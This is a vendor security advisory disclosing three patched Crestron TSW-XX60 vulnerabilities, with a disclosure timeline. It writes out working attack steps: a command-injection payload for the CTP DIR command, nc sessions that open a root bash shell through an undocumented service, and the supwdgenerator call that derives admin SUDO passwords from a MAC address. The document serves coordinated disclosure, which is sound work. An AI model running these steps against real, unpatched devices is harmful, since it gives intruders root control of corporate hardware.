Security Advisory Regarding Crestron TSW-XX60 Touch Panel Devices

August 6, 2018

Crestron produces touchscreen devices, such as the TSW-XX60 series, which can be used to schedule meeting rooms in corporate offices. After the release of a recent device firmware update (which addressed several reported vulnerabilities), Security Compass is publishing the following security advisory.

Two remote code execution vulnerabilities and one elevation of privilege vulnerability were discovered and reported to Crestron by Security Compass’ Advisory team. The related technical details are now being disclosed, following Crestron’s latest patch that successfully remediated all reported issues.

The above vulnerabilities were reported to Crestron by Security Compass (Jackson Thuraisamy) in March 2018, and an active dialogue toward remediation continued until the release of patches in May 2018.

Unauthenticated Remote Code Execution via Command Injection in Crestron Terminal Protocol (CTP)

Identifier: CVE-2018–11229

Vulnerability Details

A command-injection vulnerability existed in the Crestron TSW-XX60 touch panels that could be exploited through the CTP administrative interface open on port 41795. This Telnet-like text console is used by the Crestron Toolbox software to manage the devices. This interface does not list commands that could be used to directly access the underlying Android OS.

The CTP DIR command was vulnerable to command injection using a crafted command line payload with shell metacharacters. Output from the commands injected could be redirected into a text file on the device and read by adversaries.

Technical Description

The syntax of the DIR command allows a path to be specified:

DIR User/schedulingpanel

In the back end, the command being executed in the Android system follows:

ls -le "/mnt/sdcard/ROMDISK/User/schedulingpanel"

An adversary could modify the query to execute a command, such as the following:

ls -le "/mnt/sdcard/ROMDISK/User"; whoami > "/mnt/sdcard/ROMDISK/output.txt"

The built-in TYPE command could then be used to read the standard output of the whoami command:

TYPE output.txt
root

The base /mnt/sdcard/ROMDISK path could be discovered using built-in CTP commands (e.g. SCREENSHOT).

Unauthenticated Remote Code Execution via Bash Shell Service in Crestron Terminal Protocol (CTP)

Identifier: CVE-2018–11228

Vulnerability Details

The Crestron TSW-XX60 panels have an administrative interface open on port 41795 (Crestron Terminal Protocol). This Telnet-like text console is used by the Crestron Toolbox software to manage the touch panel devices. This interface does not list commands that could be used to directly access the underlying Android OS.

Two conditions existed on the touch panel device that allowed an adversary to gain remote code execution:

1. A system service, called telnetd_debug, was capable of binding to a Bash shell on port 23 (this service is disabled by default).

2. An undocumented administrative command (RESTARTSERVICE) could be used to start services.

These conditions could be leveraged by disabling the running telnetd service with the TELNETPORT OFF command and then starting the telnet_debugservice with the RESTARTSERVICE command. When this chain of tasks was performed, an interactive shell could be obtained with the ability to run arbitrary system commands on the device. If the user does not have administrative privileges to use a terminal command, they could leverage the built-in SUDO command to elevate to root privileges (see CVE-2018-13341 below).

Technical Description

The Crestron Toolbox Protocol can be connected to by accessing port 41795 on the TSW-XX60 device. The user would be met with a command line interface.

user@host:~$ nc -C 10.60.129.115 41795
TSW-760 Control Console
TSW-760> TELNETPORT
Telnet Port: On

The user could then disable the running Telnet service and start the telnetd_debug service.

TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> RESTARTSERVICE telnetd_debug
Service telnetd_debug restarted

The telnetd_debug service could then be connected to by accessing port 23. In response, the user received an interactive Bash shell with which commands could be run on the target device as the current running user (i.e. root).

user@host:~$ nc -C 10.60.129.115 23
bash-3.2# whoami
root
bash-3.2# pwd
/
bash-3.2# uname -a
Linux TSW760 3.10.33 #3 SMP PREEMPT Mon Nov 6 16:52:32 EST 2017 armv7l GNU/Linux

Elevation of Privilege in Crestron Terminal Protocol

Identifier: CVE-2018–13341

Vulnerability Details

Crestron TSW-XX60 touch panel devices were affected by a privilege-escalation vulnerability that could be exploited through access to administrative credentials in the device firmware. If an adversary gained access to system binaries (e.g. by obtaining the firmware), they could leverage the “supwdgenerator” binary to generate administrative passwords for the built-in SUDO command.

This command allowed lower-privileged users to provide credentials that enabled them to run Crestron Terminal Protocol (CTP) commands as an administrator after authentication. After inspecting the device firmware and generating the correct passwords, an adversary could execute commands on the device as an administrator.

Technical Description

The HELP documentation in CTP provided information about commands and the privilege required to execute them. As shown below, the supported user roles are Administrator, Programmer, and Operator.

TSW-760> HELP ALL
...
GETANALOGJOIN   Programmer    Get a analog join value
GETAUDITLOG     Administrator Retrieve the audit log.
GETDIGITALJOIN  Programmer    Get a digital join value
GETPAsswordrule Administrator Display password rules
GETSERIALJOIN   Programmer    Get a serial join value
...
PING            Operator      Ping remote node
POEPLUS         Programmer    Enable/disable 24V
PRINTAUDITLOG   Administrator Print the audit log.
PROJECTREFresh  Administrator Sets time to Refresh project.
PROJECTRESTART  Programmer    Restart the user project.
...

One of the commands (SUDO) allowed a lower-privileged user to run commands as an Administrator. This was done by authenticating with a username and password.

TSW-760> SUDO
SUDO cmd [param1 param2 ...]
cmd: command to execute.
param1,param2,…: parameters for the command.
TSW-760> SUDO DIR
Username: idontknow
Password: *********
Invalid user name or password..

Firmware analysis indicated that two additional usernames (crengsuperuser and crsuperuser) were supported, and their passwords were derived from the MAC address of the Ethernet adapter.

An adversary with access to the supwdgenerator application could run it with the command line used by the ctpd application. An example follows:

user@host:~$ ./supwdgenerator AA.BB.CC.DD.EE.FF -ForEngineerOnly wDyB[redacted]A8

The adversary could then use the password to authenticate with the SUDO command, as shown below:

TSW-760> SUDO DIR
Username: crengsuperuser
Password: ****************
Directory of 
[DIR] 02–07–18 11:27:41 ROMDISK
[DIR] 09–29–17 18:07:06 SSHBanner
[DIR] 02–07–18 11:21:16 SYS
...

Disclosure Process

  • Following Security Compass’s responsible disclosure process, Crestron PSIRT was notified of the vulnerabilities on March 9, 2018.
  • A response was promptly received from Crestron that they were investigating the matter with their engineering team.
  • Crestron acknowledged that the vulnerabilities were true positives and that they were investigating remediation.
  • A general release patch was available on May 30, 2018.

To learn more about Security Compass’ Verification Services, read about them here: https://www.securitycompass.com/advisory/services/verification/.

Author: Steven Patterson, Consultant at Security Compass
Special thank you to
Jackson Thuraisamy.

 

Previous Article
SD Elements Expands its Support for Operational Security
SD Elements Expands its Support for Operational Security

Our expert platform has now been expanded to support operational security.

Next Article
SD Elements is Compliant with GDPR
SD Elements is Compliant with GDPR

Learn how SD Elements can be used to make your organization compliant with GDPR.

×

Schedule a live demo

First Name
Last Name
Company Name
!
Thank you!
Error - something went wrong!